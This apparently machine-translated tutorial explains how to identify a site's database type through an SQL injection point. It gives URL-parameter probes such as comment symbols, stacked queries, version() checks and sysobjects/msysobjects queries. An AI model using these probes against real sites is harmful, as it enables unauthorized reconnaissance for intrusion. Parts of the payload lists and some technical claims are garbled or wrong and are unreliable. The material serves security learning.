0x00, Common Database
Common databases for Oracle, MySQL, SQL Server, Access, MSsql, MongoDB, and more.
Relational databases use foreign key associations to establish relationships between tables, and non-relational databases usually refer to data being stored in the database as objects, and relationships between objects are determined by the properties of each object itself.
Relational database: A data organization consisting of two-dimensional tables and their connections. such as: Oracle, DB2, MYSQL.
Non-relational database: the non-relational database product is a functional castrated version of the traditional relational database, which greatly improves product performance by reducing the functions that are less or less used. such as: NOSQL, Cloudant.
0x01, judging SQL injection database type method
- 1. It is possible to use a specific function that is unique to the database to judge.
- 2. Whether the auxiliary symbols can be used to judge, such as comment symbol, multi-statement query character, etc.
- 3. Whether the query can be encoded.
- 4. Whether the error message can be used.
- 5. Whether there are some features of the database to assist judgment.
- 6. Whether there is a database-Unique table name, library name.
- 7. Through a number of building stations and practical experience.
0X02, the judgment based on the specific function
Len and length
In MSSQL and MySQL as well as DB2, the return length value is called the Len () function;
When you use and Len (' a ') =1, when you return to the normal page, you can infer that the current database type might be MSSQL, or MySQL, or DB2. Conversely, it could be Oracle and Informix.
@ @version and version ()
Within MySQL, you can use @ @version or version () to return the current version information. However, you can use the version () function to construct your judgment when you cannot tell whether it is MySQL or MSSQL.
Version () >1 is probably MySQL when it returns the same page as @ @version >1. If you are prompted with a version () error, it may be MSSQL.
Substring and substr
Substring can be called in MSSQL. Oracle can only invoke substr.
0X03, auxiliary-based symbolic judgment
"/*" is an annotation in MySQL and returns an error stating that the injection point is not MySQL and continues to submit the following query characters:
"--" is an annotation that is supported by Oracle and MSSQL and, if returned correctly, is one of the two database types. Continue to submit the following query characters:
“;” is a clause query identifier, Oracle does not support multiple rows of queries, so if an error is returned, it is most likely an Oracle database.
Sometimes using--and # These two annotation symbols can also roughly confirm the database type, because MSSQL is--and MySQL is #,access does not support annotations.
http://xxx.xxx.xxx/abc.asp?p=yy--exception
HTTP://xxx.xxx.xxx/abc.asp?p=YY# Normal
Then the database is probably MySQL or access.
Add (must be an injection point) after the injection point;--(a semicolon, two horizontal lines), for example:
http://xxxx/article/as.asp?id=1;--。 If it returns to normal, the database is MSSQL. In the MSSQL database; and--all exist, for the separation of two statements, and--that is, the comment, it is not executed after the statement. If you return an error, it is almost certainly an Access database.
0X04, using System variables from the database server to differentiate
Sql-server has system variables such as User,db_name (), which can be used to determine not only sql-server but also a lot of useful information. Such as:
HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 the error of the Times may contain the information of MSSQL
For example: Microsoft OLE DB Provider for SQL Server error ' 80040e07 '
Not only can you tell if it is sql-server, but you can also get the name of the user who is currently connected to the database
0X05, judging based on display error information
After the injection point directly with single quotation marks, according to the server error information to determine the database. Error "Microsoft JET Database engine error ' 80040E14 ', which indicates the connection of the databases through the JET engine, indicates that the database is an Access database, and if it is ODBC, it is the MSSQL database."
0x06, using system tables
The system table for access is msysobjects and does not have access under the Web environment, while the sql-server system table is sysobjects and has access under the Web environment. For the following two statements:
①http://xxx.xxx.xxx/abc.asp?p=yy and (select COUNT (*) from sysobjects) >0
②http://xxx.xxx.xxx/abc.asp?p=yy and (select COUNT (*) from msysobjects) >0
If the database is Sql-server, then the first one, abc.asp must run normally, the second is abnormal;
If access is two, it will be an exception.
and exists (select COUNT (*) from sysobjects)
and exists (select COUNT (*) from msysobjects)
If the first one returns to normal, is the MSSQL database, if both are not normal, that is the Access database.
The first sentence means that the query sysobjects table record number is greater than, return to normal, the description is greater than 0 and exists sysobjects this table, because this table only MSSQL database only, so can be judged as MSSQL database. Returning an error indicates that it is not.
The second sentence submission is not returned to the normal page, even if the Access database will not return to normal. Because by default we do not have permission to query the data in this table. The web will prompt us to "record cannot be read;" Msysobjects ' no Read permission ', if this error message is returned, it proves to be an Access database.
All of the above parameters are int, and if it is a character type, precede the argument with a single quotation mark, and then add it after the query statement;--
The following lists some of the characteristics of the database, welcome to add
Sql server:
Id=1 and(Select Count(*) fromsysobjects>0return normal ID=1 and(Select Count(*) frommsysobjects)>0 return Exception ID=1 and Left(Version (),1)= 5% atID=1 and exists(SelectId fromsysobjects) ID=1 andLengthUser)>0ID=1 CHAR( the)+ CHAR( the)+ CHAR( -)+ CHAR( +)+ CHAR( the)+ CHAR( A)+ CHAR( the)
ACCESS:
ID=1 and (selectcount (* from sysobjects)> 0 Returns the exception id=1 and (selectcount (* from msysobjects)>0 Return exception
Mysql:
Id=2 andVersion ()>0return normal ID=2 andLengthUser())>0ID=2 CHAR( the, the, -, +, the, A, the)
ORACLE:
ID=1and '1'| | ' 1 ' = ' id=1 and 0<> (select COUNT (*) from dual) Id=1 CHR (97) | | CHR (110) | | CHR (100) | | CHR (32) | | CHR (49) | | CHR (61) | | CHR (+)
0x07, according to experience to judge
ASP small and medium-sized web site is generally access to do database, large sites may use SQL Server;
Asp. NET Web sites are generally mostly SQL Server;
PHP's website will be used by MySQL;
The JSP Web site will use SQL Server or oracle!
0x08, reference links
Https://www.jianshu.com/p/e308d96e2ecd
Create a database type judgment summary